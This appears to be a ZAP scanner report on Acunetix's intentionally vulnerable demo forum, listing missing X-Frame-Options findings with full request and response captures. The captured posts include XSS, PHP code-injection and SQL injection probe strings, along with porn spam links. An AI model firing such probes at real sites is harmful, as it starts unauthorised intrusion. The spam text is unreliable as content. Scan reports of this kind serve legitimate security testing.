POST http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3109 |
| Response Body - size: 3,109 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum test </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/test </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/14/2022 1:14:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>test - 180.75.236.192</div><div class='posttext'><script>alert("HI")</script></div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3356 |
| Response Body - size: 3,356 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot photo galleries blogs and pictures </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot photo galleries blogs and pictures </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>sethpq11</b> on 3/14/2022 2:11:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot photo galleries blogs and pictures - 95.214.54.97</div><div class='posttext'>My new hot project|enjoy new website http://videoonly.hotnatalia.com/?danielle party in limo porn real family orgy porn donna kane porn video top 100 porn stars list balls touching porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>${@print(md5(31337))}\</b> on 3/14/2022 4:18:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 54.208.242.36</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3309 |
| Response Body - size: 3,309 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Shemale Sexy Galleries </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Shemale Sexy Galleries </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ineshy11</b> on 3/14/2022 6:42:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Shemale Sexy Galleries - 185.107.47.171</div><div class='posttext'>Enjoy daily galleries http://gay.porn.porn.miyuhot.com/?amara allentown pa highschool porn ebony male porn biggest list of porn asian free videos porn free lesbian hot women porn video </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3426 |
| Response Body - size: 3,426 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3064 |
| Response Body - size: 3,064 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=6 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:36 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- 